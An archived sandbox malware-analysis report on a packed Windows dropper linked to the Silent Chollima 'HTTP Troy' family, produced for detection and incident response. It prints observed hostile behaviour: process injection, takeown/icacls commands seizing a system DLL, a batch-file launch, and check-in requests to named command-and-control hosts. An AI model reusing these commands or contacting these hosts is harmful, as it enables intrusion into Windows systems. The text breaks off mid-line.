{
	"id": "a91ebb50-b8f1-469d-b32a-5a58ce06eab1",
	"created_at": "2026-04-06T00:07:03.576359Z",
	"updated_at": "2026-04-10T03:34:54.481202Z",
	"deleted_at": null,
	"sha1_hash": "a1e53aa284db83d833dd6e87d72502b4e9c192f8",
	"title": "Free Automated Malware Analysis Service - powered by Falcon Sandbox",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 166462,
	"plain_text": "Free Automated Malware Analysis Service - powered by Falcon Sandbox\r\nArchived: 2026-04-02 10:36:53 UTC\r\nAttention: please enable javascript in order to properly view and use this malware analysis service.\r\nIncident Response\r\nRisk Assessment\r\nPersistence\r\nGrants permissions using icacls (DACL modification)\r\nInjects into explorer\r\nInjects into remote processes\r\nSpawns a lot of processes\r\nTries to take ownership of files\r\nWrites data to a remote process\r\nNetwork Behavior\r\nContacts 1 domain and 1 host. View all details\r\nIndicators\r\nNot all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.\r\nEnvironment Awareness\r\nThe input sample contains a known anti-VM trick\r\ndetails\r\nFound VM detection artifact \"VMware trick\" in \"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\"\r\n(Offset: 2230)\r\nsource\r\nBinary File\r\nrelevance\r\n5/10\r\nExternal Systems\r\nDetected Suricata Alert\r\ndetails\r\nDetected alert \"ETPRO TROJAN Win32/Spy.Keydoor.D Checkin\" (SID: 2805200, Rev: 4, Severity: 1)\r\ncategorized as \"A Network Trojan was detected\" (Backdoor, ransomware, trojans, etc.)\r\nDetected alert \"CrowdStrike SILENT CHOLLIMA HTTP/IRC Bot/RAT and Concealment Troy GET\r\nRequest\" (SID: 181303201, Rev: 20130830, Severity: 1) categorized as \"A Network Trojan was\r\ndetected\"\r\nsource\r\nSuricata Alerts\r\nrelevance\r\n10/10\r\nFound an IP/URL artifact that was identified as malicious by a significant amount of reputation engines\r\ndetails\r\n3/67 reputation engines marked \"http://lawbookcenter.co.kr/shop/temp/goods_list.php\" as malicious\r\n(4% detection rate)\r\n3/64 reputation engines marked \"http://solarshade.co.kr/eml/goods_list_ok.php\" as malicious (4%\r\ndetection rate)\r\nsource\r\nExternal System\r\nrelevance\r\n10/10\r\nSample was identified as malicious by a large number of Antivirus engines\r\ndetails\r\n46/66 Antivirus vendors marked sample as malicious (69% detection rate)\r\nsource\r\nExternal System\r\nrelevance\r\n10/10\r\nSample was identified as malicious by at least one Antivirus engine\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 1 of 25\n\ndetails\r\n46/66 Antivirus vendors marked sample as malicious (69% detection rate)\r\nsource\r\nExternal System\r\nrelevance\r\n8/10\r\nGeneral\r\nThe analysis extracted a file that was identified as malicious\r\ndetails\r\n51/65 Antivirus vendors marked dropped file \"w7e2219.tmp\" as malicious (classified as\r\n\"Gen:ExplorerHijack.Hu4@aWQ@tkgO\" with 78% detection rate)\r\n37/50 Antivirus vendors marked dropped file \"~ER24B7.tmp\" as malicious (classified as\r\n\"Gen:Trojan.Heur.LP\" with 74% detection rate)\r\n43/53 Antivirus vendors marked dropped file \"~ER1AFA.tmp\" as malicious (classified as\r\n\"Trojan.Generic\" with 81% detection rate)\r\nsource\r\nBinary File\r\nrelevance\r\n10/10\r\nThe analysis spawned a process that was identified as malicious\r\ndetails\r\n43/53 Antivirus vendors marked spawned process \"~ER1AFA.tmp\" (PID: 2080) as malicious\r\n(classified as \"Trojan.Generic\" with 81% detection rate)\r\nsource\r\nMonitored Target\r\nrelevance\r\n10/10\r\nInstallation/Persistance\r\nAllocates virtual memory in a remote process\r\ndetails\r\n\"\u003cInput Sample\u003e\" allocated memory in \"%TEMP%\\ud.bat\"\r\n\"~ER1AFA.tmp\" allocated memory in \"%TEMP%\\w7e2219.tmp\"\r\n\"sysprep.exe\" allocated memory in\r\n\"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\"\r\nsource\r\nAPI Call\r\nrelevance\r\n7/10\r\nInjects into explorer\r\ndetails\r\nInjected into \"explorer.exe\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n5/10\r\nInjects into remote processes\r\ndetails\r\nInjected into \"explorer.exe\" at 2018-6-12.01:21:31.015 (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n6/10\r\nWrites data to a remote process\r\ndetails\r\n\"\u003cInput Sample\u003e\" wrote 32 bytes to a remote process \"%TEMP%\\~ER1AFA.tmp\" (Handle: 44)\r\n\"\u003cInput Sample\u003e\" wrote 52 bytes to a remote process\r\n\"C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\~ER1AFA.tmp\" (Handle: 44)\r\n\"\u003cInput Sample\u003e\" wrote 4 bytes to a remote process\r\n\"C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\~ER1AFA.tmp\" (Handle: 44)\r\n\"~ER1AFA.tmp\" wrote 96 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 56 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 28 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 84 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 80 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 2 of 25\n\n\"~ER1AFA.tmp\" wrote 88 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 24 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 20 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 13 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 15 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 12 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 17 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 16 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 134 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 1104 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"explorer.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sysprep\\sysprep.exe\"\r\n(Handle: 3072)\r\n\"explorer.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sysprep\\sysprep.exe\"\r\n(Handle: 3072)\r\n\"explorer.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sysprep\\sysprep.exe\"\r\n(Handle: 3072)\r\n\"sysprep.exe\" wrote 32 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 312)\r\n\"sysprep.exe\" wrote 52 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 312)\r\n\"sysprep.exe\" wrote 4 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 312)\r\n\"sysprep.exe\" wrote 8 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 312)\r\n\"cmd.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\takeown.exe\" (Handle: 84)\r\n\"cmd.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\takeown.exe\" (Handle: 84)\r\n\"cmd.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\takeown.exe\" (Handle: 84)\r\n\"cmd.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\icacls.exe\" (Handle: 80)\r\n\"cmd.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\icacls.exe\" (Handle: 80)\r\n\"cmd.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\icacls.exe\" (Handle: 80)\r\n\"iexplore.exe\" wrote 32 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 1164)\r\n\"iexplore.exe\" wrote 52 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 1164)\r\n\"iexplore.exe\" wrote 4 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 1164)\r\nsource\r\nAPI Call\r\nrelevance\r\n6/10\r\nPattern Matching\r\nYARA signature match\r\ndetails\r\nYARA signature \"Codoso_Gh0st_1\" classified file \"~ER1AFA.tmp\" as \"apt,codoso,plugx\" based on\r\nindicators:\r\n\"45006c00650076006100740069006f006e003a00410064006d0069006e006900730074007200610074006f00720021006e006500770\r\n(Reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, Author:\r\nFlorian Roth)\r\nInternal YARA signature matched on process \"~ER1AFA.tmp\"\r\nInternal YARA signature matched on file \"all.bstring\"\r\nsource\r\nYARA Signature\r\nrelevance\r\n10/10\r\nSystem Security\r\nModifies the access control lists of files\r\ndetails\r\nProcess \"icacls.exe\" with commandline \"icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant\r\nadministrators:F\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n5/10\r\nUnusual Characteristics\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 3 of 25\n\nSpawns a lot of processes\r\ndetails\r\nSpawned process \"\u003cInput Sample\u003e\" (Show Process)\r\nSpawned process \"~ER1AFA.tmp\" (Show Process)\r\nSpawned process \"sysprep.exe\" with commandline \"\"%WINDIR%\\System32\\sysprep\\sysprep.exe\" \"\"\r\n(Show Process), Spawned process \"cmd.exe\" with commandline \"/c takeown /f\r\n\"%WINDIR%\\system32\\msimg64.dll\" \u0026\u0026 icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant\r\nadministrators:F\" (Show Process), Spawned process \"takeown.exe\" with commandline \"takeown /f\r\n\"%WINDIR%\\system32\\msimg64.dll\"\" (Show Process), Spawned process \"icacls.exe\" with\r\ncommandline \"icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant administrators:F\" (Show Process),\r\nSpawned process \"cmd.exe\" with commandline \"cmd /c %TEMP%\\\\ud.bat\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n8/10\r\nHiding 3 Malicious Indicators\r\nAll indicators are available only in the private webservice or standalone version\r\nAnti-Detection/Stealthyness\r\nContains ability to open/control a service\r\nQueries process information\r\ndetails\r\n\"~ER1AFA.tmp\" queried SystemProcessInformation at 00013784-00002080-00000105-8311148578\r\nsource\r\nAPI Call\r\nrelevance\r\n4/10\r\nAnti-Reverse Engineering\r\nPE file has unusual entropy sections\r\ndetails\r\nUPX1 with unusual entropies 7.9309190833\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nPE file is packed with UPX\r\ndetails\r\n\"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\" has a section named \"UPX0\"\r\n\"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\" has a section named \"UPX1\"\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nCryptographic Related\r\nFound a cryptographic related string\r\ndetails\r\n\"DES\" (Indicator: \"des\"; File: \"00013784-00002080.00000000.14285.00995000.00000002.mdmp\")\r\nsource\r\nFile/Memory\r\nrelevance\r\n10/10\r\nEnvironment Awareness\r\nContains ability to query CPU information\r\nExternal Systems\r\nFound an IP/URL artifact that was identified as malicious by at least one reputation engine\r\ndetails\r\n3/67 reputation engines marked \"http://lawbookcenter.co.kr/shop/temp/goods_list.php\" as malicious\r\n(4% detection rate)\r\n3/64 reputation engines marked \"http://solarshade.co.kr/eml/goods_list_ok.php\" as malicious (4%\r\ndetection rate)\r\n1/67 reputation engines marked \"http://lawbookcenter.co.kr\" as malicious (1% detection rate)\r\nsource\r\nExternal System\r\nrelevance\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 4 of 25\n\n10/10\r\nGeneral\r\nContains ability to find and load resources of a specific module\r\ndetails\r\nFindResourceW@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n1/10\r\nInstallation/Persistance\r\nContains ability to create a remote thread (often used for process injection)\r\ndetails\r\nCreateRemoteThread@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n8/10\r\nContains ability to write to a remote process\r\ndetails\r\nWriteProcessMemory@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)\r\nWriteProcessMemory@KERNEL32.dll (Show Stream)\r\nWriteProcessMemory@KERNEL32.dll (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n8/10\r\nCreates new processes\r\ndetails\r\n\"\u003cInput Sample\u003e\" is creating a new process (Name: \"%TEMP%\\~ER1AFA.tmp\", Handle: 44)\r\n\"\u003cInput Sample\u003e\" is creating a new process\r\n\"\u003cInput Sample\u003e\" is creating a new process (Name: \"%WINDIR%\\System32\\cmd.exe\", Handle: 52)\r\n\"explorer.exe\" is creating a new process (Name:\r\n\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\", Handle: 3072)\r\n\"sysprep.exe\" is creating a new process (Name: \"%WINDIR%\\System32\\cmd.exe\", Handle: 304)\r\n\"sysprep.exe\" is creating a new process (Name: \"%PROGRAMFILES%\\Internet\r\nExplorer\\iexplore.exe\", Handle: 312)\r\n\"cmd.exe\" is creating a new process (Name: \"%WINDIR%\\System32\\takeown.exe\", Handle: 84)\r\n\"cmd.exe\" is creating a new process (Name: \"%WINDIR%\\System32\\icacls.exe\", Handle: 80)\r\n\"iexplore.exe\" is creating a new process (Name: \"C:\\Program Files\\Internet Explorer\\iexplore.exe\",\r\nHandle: 1164)\r\nsource\r\nAPI Call\r\nrelevance\r\n8/10\r\nDrops executable files\r\ndetails\r\n\"w7e2219.tmp\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"\r\n\"~ER24B7.tmp\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"\r\n\"~ER1AFA.tmp\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"\r\nsource\r\nBinary File\r\nrelevance\r\n10/10\r\nSpyware/Information Retrieval\r\nContains ability to enumerate processes/modules/threads\r\ndetails\r\nCreateToolhelp32Snapshot@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n5/10\r\nSystem Destruction\r\nMarks file for deletion\r\ndetails\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 5 of 25\n\n\"C:\\c9b65b764985dfd7a11d3faf599c56b8.exe\" marked \"%TEMP%\\~ER1AFA.tmp\" for deletion\r\n\"%TEMP%\\~ER1AFA.tmp\" marked \"%TEMP%\\w7e2219.tmp\" for deletion\r\n\"%WINDIR%\\System32\\sysprep\\sysprep.exe\" marked \"%TEMP%\\~ER24B7.tmp\" for deletion\r\nsource\r\nAPI Call\r\nrelevance\r\n10/10\r\nOpens file with deletion access rights\r\ndetails\r\n\"\u003cInput Sample\u003e\" opened \"%TEMP%\\~ER1AFA.tmp\" with delete access\r\n\"~ER1AFA.tmp\" opened \"%TEMP%\\w7e2219.tmp\" with delete access\r\n\"sysprep.exe\" opened \"%TEMP%\\~ER24B7.tmp\" with delete access\r\nsource\r\nAPI Call\r\nrelevance\r\n7/10\r\nSystem Security\r\nGrants permissions using icacls (DACL modification)\r\ndetails\r\nProcess \"icacls.exe\" with commandline \"icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant\r\nadministrators:F\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n3/10\r\nTries to take ownership of files\r\ndetails\r\nProcess \"cmd.exe\" with commandline \"/c takeown /f \"%WINDIR%\\system32\\msimg64.dll\" \u0026\u0026 icacls\r\n\"%WINDIR%\\system32\\msimg64.dll\" /grant administrators:F\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n5/10\r\nUnusual Characteristics\r\nCRC value set in PE header does not match actual value\r\ndetails\r\n\"w7e2219.tmp\" claimed CRC 564747 while the actual is CRC 354185\r\n\"~ER24B7.tmp\" claimed CRC 289298 while the actual is CRC 564747\r\n\"~ER1AFA.tmp\" claimed CRC 1105664 while the actual is CRC 289298\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nEntrypoint in PE header is within an uncommon section\r\ndetails\r\n\"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\" has an entrypoint in section \"UPX1\"\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nImports suspicious APIs\r\ndetails\r\nRegCloseKey\r\nVirtualProtect\r\nGetProcAddress\r\nVirtualAlloc\r\nLoadLibraryA\r\nOpenProcessToken\r\nStartServiceA\r\nRegCreateKeyExA\r\nRegOpenKeyExA\r\nRegEnumKeyExA\r\nGetTempPathA\r\nWriteFile\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 6 of 25\n\nWriteProcessMemory\r\nGetModuleFileNameW\r\nCopyFileA\r\nGetModuleFileNameA\r\nUnhandledExceptionFilter\r\nGetModuleHandleA\r\nTerminateProcess\r\nCreateToolhelp32Snapshot\r\nLoadLibraryW\r\nGetTickCount\r\nGetVersionExA\r\nProcess32Next\r\nCreateRemoteThread\r\nGetStartupInfoA\r\nProcess32First\r\nDeleteFileA\r\nGetStartupInfoW\r\nGetTempFileNameA\r\nCreateFileW\r\nIsDebuggerPresent\r\nCreateFileA\r\nVirtualAllocEx\r\nLockResource\r\nGetCommandLineA\r\nGetModuleHandleW\r\nCreateProcessA\r\nSleep\r\nFindResourceA\r\nCryptEncrypt\r\nCreateProcessAsUserA\r\nRegDeleteValueA\r\nCreateFileMappingA\r\nGetFileAttributesA\r\nGetDriveTypeA\r\nOpenFileMappingA\r\nCreateThread\r\nExitThread\r\nGetFileSize\r\nOpenProcess\r\nCreateDirectoryA\r\nFindFirstFileA\r\nGetComputerNameA\r\nFindNextFileA\r\nMapViewOfFile\r\nGetCommandLineW\r\nDeleteFileW\r\nProcess32FirstW\r\nGetTempFileNameW\r\nProcess32NextW\r\nGetTempPathW\r\nFindResourceW\r\nVirtualProtectEx\r\nsource\r\nStatic Parser\r\nrelevance\r\n1/10\r\nHiding 1 Suspicious Indicators\r\nAll indicators are available only in the private webservice or standalone version\r\nAnti-Reverse Engineering\r\nContains ability to register a top-level exception handler (often used as anti-debugging trick)\r\nPE file contains zero-size sections\r\ndetails\r\nRaw size of \"UPX0\" is zero\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 7 of 25\n\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nEnvironment Awareness\r\nContains ability to query machine time\r\nContains ability to query the machine version\r\ndetails\r\nGetVersionExA@KERNEL32.dll (Show Stream)\r\nGetVersionExA@KERNEL32.dll (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n1/10\r\nContains ability to query the system locale\r\nMakes a code branch decision directly after an API that is environment aware\r\ndetails\r\nFound API call GetLocalTime@KERNEL32.dll directly followed by \"cmp esi, dword ptr\r\n[10038A64h]\" and \"jnl 10001CD0h\" (Show Stream)\r\nFound API call GetVersionExA@KERNEL32.dll directly followed by \"cmp dword ptr [ebp-00000094h], 06h\" and \"inc eax\" (Show Stream)\r\nFound API call GetVersionExA@KERNEL32.dll directly followed by \"cmp dword ptr [ebp-00000094h], 06h\" and \"inc eax\" (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n10/10\r\nReads the active computer name\r\ndetails\r\n\"sysprep.exe\" (Path:\r\n\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\";\r\nKey: \"COMPUTERNAME\")\r\n\"takeown.exe\" (Path:\r\n\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\";\r\nKey: \"COMPUTERNAME\")\r\n\"icacls.exe\" (Path:\r\n\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\";\r\nKey: \"COMPUTERNAME\")\r\nsource\r\nRegistry Access\r\nrelevance\r\n5/10\r\nTries to sleep for a long time (more than two minutes)\r\ndetails\r\n\"iexplore.exe\" sleeping for \"01320000\" milliseconds\r\nsource\r\nAPI Call\r\nrelevance\r\n10/10\r\nGeneral\r\nContacts domains\r\ndetails\r\n\"solarshade.co.kr\"\r\nsource\r\nNetwork Traffic\r\nrelevance\r\n1/10\r\nContacts server\r\ndetails\r\n\"221.143.46.43:80\"\r\nsource\r\nNetwork Traffic\r\nrelevance\r\n1/10\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 8 of 25\n\nContains PDB pathways\r\ndetails\r\n\"o.pdbm1V\"\r\n\"%SAMPLEDIR%\\1Mission\\Team_Project\\[2012.6 ~]\\HTTP\r\nTroy\\HttpDr0pper\\x64\\Release\\3PayloadDll.pdb\"\r\n\"%SAMPLEDIR%\\1Mission\\Team_Project\\[2012.6 ~]\\HTTP\r\nTroy\\HttpDr0pper\\Win32\\Release\\HttpSecurityProvider.pdb\"\r\n\"%SAMPLEDIR%\\1Mission\\Team_Project\\[2012.6 ~]\\HTTP\r\nTroy\\HttpDr0pper\\x64\\Release\\HttpSecurityProvider.pdb\"\r\n\"%SAMPLEDIR%\\1Mission\\Team_Project\\[2012.6 ~]\\HTTP\r\nTroy\\HttpDr0pper\\Win32\\Release\\3PayloadDll.pdb\"\r\nsource\r\nFile/Memory\r\nrelevance\r\n1/10\r\nCreates a writable file in a temporary directory\r\ndetails\r\n\"\u003cInput Sample\u003e\" created file \"%TEMP%\\~ER1AFA.tmp\"\r\n\"\u003cInput Sample\u003e\" created file \"%TEMP%\\ud.bat\"\r\n\"~ER1AFA.tmp\" created file \"%TEMP%\\w7e2219.tmp\"\r\n\"sysprep.exe\" created file \"%TEMP%\\~ER24B7.tmp\"\r\n\"iexplore.exe\" created file \"%TEMP%\\~DFF452498869DECF72.TMP\"\r\n\"iexplore.exe\" created file \"%TEMP%\\~DFF818A5A707F378C8.TMP\"\r\n\"iexplore.exe\" created file \"%TEMP%\\~13785.tmp\"\r\nsource\r\nAPI Call\r\nrelevance\r\n1/10\r\nCreates mutants\r\ndetails\r\n\"\\Sessions\\1\\BaseNamedObjects\\{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}\"\r\n\"{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\SYSPREP-APP-5c9fbbd0-ee0e-11d2-9a21-0000f81edacc\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Global\\WdsSetupLogInit\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Global\\SetupLog\"\r\n\"Global\\SetupLog\"\r\n\"SYSPREP-APP-5c9fbbd0-ee0e-11d2-9a21-0000f81edacc\"\r\n\"Global\\WdsSetupLogInit\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\_!MSFTHISTORY!_\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!ffqm9td!appdata!local!microsoft!windows!temporary\r\ninternet files!content.ie5!\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!ffqm9td!appdata!roaming!microsoft!windows!cookies!\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!ffqm9td!appdata!local!microsoft!windows!history!history.ie5!\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetStartupMutex\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetConnectionMutex\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetProxyRegistryMutex\"\r\nsource\r\nCreated Mutant\r\nrelevance\r\n3/10\r\nGETs files from a webserver\r\ndetails\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=3740962\u0026sc=b984cf5bcbf0f38f3d136d1f97103a91\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=5265868\u0026sc=2e03e977aa881c76f7df783789a1e026\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=6906788\u0026sc=412dd86c4ba55fde5144cf03627da841\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nsource\r\nNetwork Traffic\r\nrelevance\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 9 of 25\n\n5/10\r\nLaunches a browser\r\ndetails\r\nLaunches browser \"iexplore.exe\" (Show Process)\r\nLaunches browser \"iexplore.exe\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n3/10\r\nProcess launched with changed environment\r\ndetails\r\nProcess \"explorer.exe\" (Show Process) was launched with new environment variables:\r\n\"SESSIONNAME=\"Console\"\"\r\nProcess \"explorer.exe\" (Show Process) was launched with modified environment variables: \"Path\"\r\nProcess \"explorer.exe\" (Show Process) was launched with missing environment variables: \"PROMPT\"\r\nProcess \"takeown.exe\" (Show Process) was launched with new environment variables:\r\n\"PROMPT=\"$P$G\"\"\r\nProcess \"iexplore.exe\" (Show Process) was launched with missing environment variables: \"PROMPT\"\r\nProcess \"cmd.exe\" (Show Process) was launched with new environment variables:\r\n\"PROMPT=\"$P$G\"\"\r\nProcess \"cmd.exe\" (Show Process) was launched with modified environment variables: \"Path\"\r\nProcess \"cmd.exe\" (Show Process) was launched with missing environment variables:\r\n\"SESSIONNAME\"\r\nsource\r\nMonitored Target\r\nrelevance\r\n10/10\r\nRuns shell commands\r\ndetails\r\n\"/c takeown /f \"%WINDIR%\\system32\\msimg64.dll\" \u0026\u0026 icacls\r\n\"%WINDIR%\\system32\\msimg64.dll\" /grant administrators:F\" on 2018-6-12.01:21:31.576\r\n\"cmd /c %TEMP%\\\\ud.bat\" on 2018-6-12.01:22:54.322\r\nsource\r\nMonitored Target\r\nrelevance\r\n5/10\r\nSpawns new processes\r\ndetails\r\nSpawned process \"~ER1AFA.tmp\" (Show Process)\r\nSpawned process \"sysprep.exe\" with commandline \"\"%WINDIR%\\System32\\sysprep\\sysprep.exe\" \"\"\r\n(Show Process), Spawned process \"cmd.exe\" with commandline \"/c takeown /f\r\n\"%WINDIR%\\system32\\msimg64.dll\" \u0026\u0026 icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant\r\nadministrators:F\" (Show Process), Spawned process \"iexplore.exe\" with commandline\r\n\"www.google.com\" (Show Process), Spawned process \"takeown.exe\" with commandline \"takeown /f\r\n\"%WINDIR%\\system32\\msimg64.dll\"\" (Show Process), Spawned process \"icacls.exe\" with\r\ncommandline \"icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant administrators:F\" (Show Process),\r\nSpawned process \"iexplore.exe\" with commandline \"SCODEF:2096 CREDAT:79873\" (Show Process),\r\nSpawned process \"cmd.exe\" with commandline \"cmd /c %TEMP%\\\\ud.bat\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n3/10\r\nTries to GET non-existent files from a webserver\r\ndetails\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=3740962\u0026sc=b984cf5bcbf0f38f3d136d1f97103a91\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=5265868\u0026sc=2e03e977aa881c76f7df783789a1e026\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\n\"GET 